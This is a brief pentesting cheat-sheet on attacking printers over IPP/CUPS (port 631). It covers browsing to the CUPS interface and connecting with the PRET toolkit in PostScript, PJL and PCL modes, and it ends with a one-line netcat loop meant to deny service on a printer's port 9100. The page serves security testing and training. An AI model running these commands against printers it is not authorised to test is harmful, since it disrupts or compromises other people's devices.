# IPP (Internet Printing Protocol) Pentesting

IPP is a protocol for communicating between client devices and printers. A default port is 631.

### Access in Web Browser <a href="#access-in-web-browser" id="access-in-web-browser"></a>

The CUPS server can be able to access via browser.\
Try input the following in the URL search form in browser.

```shellscript
http://<target-ip>:631
```

### Connect <a href="#connect" id="connect"></a>

[**The Printer Exploitation Toolkit**](https://github.com/RUB-NDS/PRET) is a tool for printer secure testing. Assume that we use it.\
Try all three options until the target printer recognized.

```shellscript
# ps: PostScript
python2 pret.py <target-ip>:631 ps

# pjl: Printer Job Language
python2 pret.py <target-ip>:631 pjl

# pcl: Printer Control Language
python2 pret.py <target-ip>:631 pcl
```

### Commands in PRET Shell <a href="#commands-in-pret-shell" id="commands-in-pret-shell"></a>

After connecting the target printer, we can test using the following commands.

```shellscript
# Print usage
> ?
> ? <command>
```

### Other Exploits <a href="#other-exploits" id="other-exploits"></a>

#### Denial of Service (DoS) <a href="#denial-of-service-dos" id="denial-of-service-dos"></a>

```shellscript
while true; do nc printer 9100; done
```

### References <a href="#references" id="references"></a>

* [TryHackMe](https://tryhackme.com/room/printerhacking101)
* [Printer Security Testing Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)